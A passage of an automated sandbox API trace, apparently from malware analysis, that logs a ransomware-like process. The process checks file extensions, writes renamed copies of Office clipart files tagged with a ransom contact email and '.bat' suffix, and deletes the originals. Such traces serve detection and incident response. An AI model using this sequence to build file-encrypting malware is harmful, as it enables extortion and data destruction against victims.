(lpString=".xlsx") returned 5 [0064.032] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0064.032] lstrlenW (lpString=".ppt") returned 4 [0064.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.032] lstrlenW (lpString=".zip") returned 4 [0064.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.033] lstrlenW (lpString=".rar") returned 4 [0064.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.033] lstrlenW (lpString=".bz2") returned 4 [0064.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.033] lstrlenW (lpString=".7z") returned 3 [0064.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.033] lstrlenW (lpString=".dbf") returned 4 [0064.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.033] lstrlenW (lpString=".1cd") returned 4 [0064.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 68 [0064.033] lstrlenW (lpString=".jpg") returned 4 [0064.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.034] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.034] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.034] GetLastError () returned 0x0 [0064.034] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x94a, lpOverlapped=0x0) returned 1 [0064.052] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x950, lpOverlapped=0x0) returned 1 [0064.053] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.053] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.053] SetEndOfFile (hFile=0x354) returned 1 [0064.053] CloseHandle (hObject=0x354) returned 1 [0064.054] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.054] SetEndOfFile (hFile=0x388) returned 1 [0064.055] CloseHandle (hObject=0x388) returned 1 [0064.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString=".doc") returned 4 [0064.056] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString=".docx") returned 5 [0064.056] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.056] lstrlenW (lpString=".pdf") returned 4 [0064.056] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString=".xls") returned 4 [0064.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.056] lstrlenW (lpString=".xlsx") returned 5 [0064.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.056] lstrlenW (lpString=".ppt") returned 4 [0064.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString=".zip") returned 4 [0064.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.056] lstrlenW (lpString=".rar") returned 4 [0064.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString=".bz2") returned 4 [0064.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString=".7z") returned 3 [0064.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString=".dbf") returned 4 [0064.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString=".1cd") returned 4 [0064.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 68 [0064.056] lstrlenW (lpString=".jpg") returned 4 [0064.057] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.057] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.057] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.057] GetLastError () returned 0x0 [0064.057] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x876, lpOverlapped=0x0) returned 1 [0064.065] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x880, lpOverlapped=0x0) returned 1 [0064.066] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.066] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.066] SetEndOfFile (hFile=0x354) returned 1 [0064.066] CloseHandle (hObject=0x354) returned 1 [0064.067] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.067] SetEndOfFile (hFile=0x388) returned 1 [0064.069] CloseHandle (hObject=0x388) returned 1 [0064.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.070] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0064.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.070] lstrlenW (lpString=".doc") returned 4 [0064.070] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.070] lstrlenW (lpString=".docx") returned 5 [0064.070] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.070] lstrlenW (lpString=".pdf") returned 4 [0064.070] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.070] lstrlenW (lpString=".xls") returned 4 [0064.070] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.070] lstrlenW (lpString=".xlsx") returned 5 [0064.070] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.070] lstrlenW (lpString=".ppt") returned 4 [0064.070] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.070] lstrlenW (lpString=".zip") returned 4 [0064.070] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.070] lstrlenW (lpString=".rar") returned 4 [0064.070] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.071] lstrlenW (lpString=".bz2") returned 4 [0064.071] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.071] lstrlenW (lpString=".7z") returned 3 [0064.071] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.071] lstrlenW (lpString=".dbf") returned 4 [0064.071] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.071] lstrlenW (lpString=".1cd") returned 4 [0064.071] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0064.071] lstrlenW (lpString=".jpg") returned 4 [0064.071] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.071] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.071] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.071] GetLastError () returned 0x0 [0064.071] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x20ae, lpOverlapped=0x0) returned 1 [0064.095] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x20b0, lpOverlapped=0x0) returned 1 [0064.096] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.096] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.096] SetEndOfFile (hFile=0x354) returned 1 [0064.150] CloseHandle (hObject=0x354) returned 1 [0064.151] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.151] SetEndOfFile (hFile=0x388) returned 1 [0064.152] CloseHandle (hObject=0x388) returned 1 [0064.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0064.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.200] lstrlenW (lpString=".doc") returned 4 [0064.200] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.200] lstrlenW (lpString=".docx") returned 5 [0064.200] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.200] lstrlenW (lpString=".pdf") returned 4 [0064.200] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.200] lstrlenW (lpString=".xls") returned 4 [0064.200] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.200] lstrlenW (lpString=".xlsx") returned 5 [0064.200] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.200] lstrlenW (lpString=".ppt") returned 4 [0064.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.200] lstrlenW (lpString=".zip") returned 4 [0064.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.201] lstrlenW (lpString=".rar") returned 4 [0064.201] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.201] lstrlenW (lpString=".bz2") returned 4 [0064.201] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.201] lstrlenW (lpString=".7z") returned 3 [0064.201] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.201] lstrlenW (lpString=".dbf") returned 4 [0064.201] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.201] lstrlenW (lpString=".1cd") returned 4 [0064.201] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 68 [0064.201] lstrlenW (lpString=".jpg") returned 4 [0064.201] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.202] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.202] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.202] GetLastError () returned 0x0 [0064.202] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3a94, lpOverlapped=0x0) returned 1 [0064.254] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3aa0, lpOverlapped=0x0) returned 1 [0064.255] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.255] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.255] SetEndOfFile (hFile=0x354) returned 1 [0064.267] CloseHandle (hObject=0x354) returned 1 [0064.268] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.268] SetEndOfFile (hFile=0x388) returned 1 [0064.274] CloseHandle (hObject=0x388) returned 1 [0064.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0064.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.277] lstrlenW (lpString=".doc") returned 4 [0064.277] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.277] lstrlenW (lpString=".docx") returned 5 [0064.277] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.277] lstrlenW (lpString=".pdf") returned 4 [0064.277] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.277] lstrlenW (lpString=".xls") returned 4 [0064.277] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.277] lstrlenW (lpString=".xlsx") returned 5 [0064.277] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.277] lstrlenW (lpString=".ppt") returned 4 [0064.278] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.278] lstrlenW (lpString=".zip") returned 4 [0064.278] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.278] lstrlenW (lpString=".rar") returned 4 [0064.278] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.278] lstrlenW (lpString=".bz2") returned 4 [0064.278] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.278] lstrlenW (lpString=".7z") returned 3 [0064.278] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.278] lstrlenW (lpString=".dbf") returned 4 [0064.278] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.278] lstrlenW (lpString=".1cd") returned 4 [0064.278] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0064.278] lstrlenW (lpString=".jpg") returned 4 [0064.278] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.280] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.280] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.281] GetLastError () returned 0x0 [0064.281] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xdec, lpOverlapped=0x0) returned 1 [0064.330] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xdf0, lpOverlapped=0x0) returned 1 [0064.331] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.331] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe8, lpOverlapped=0x0) returned 1 [0064.331] SetEndOfFile (hFile=0x340) returned 1 [0064.331] CloseHandle (hObject=0x340) returned 1 [0064.333] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.333] SetEndOfFile (hFile=0x2c8) returned 1 [0064.334] CloseHandle (hObject=0x2c8) returned 1 [0064.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0064.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.337] lstrlenW (lpString=".doc") returned 4 [0064.337] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.337] lstrlenW (lpString=".docx") returned 5 [0064.337] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0064.337] lstrlenW (lpString=".pdf") returned 4 [0064.337] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.337] lstrlenW (lpString=".xls") returned 4 [0064.337] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.337] lstrlenW (lpString=".xlsx") returned 5 [0064.338] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0064.338] lstrlenW (lpString=".ppt") returned 4 [0064.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.338] lstrlenW (lpString=".zip") returned 4 [0064.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.338] lstrlenW (lpString=".rar") returned 4 [0064.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.338] lstrlenW (lpString=".bz2") returned 4 [0064.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.338] lstrlenW (lpString=".7z") returned 3 [0064.338] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.338] lstrlenW (lpString=".dbf") returned 4 [0064.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.338] lstrlenW (lpString=".1cd") returned 4 [0064.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 66 [0064.338] lstrlenW (lpString=".jpg") returned 4 [0064.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.341] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.341] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 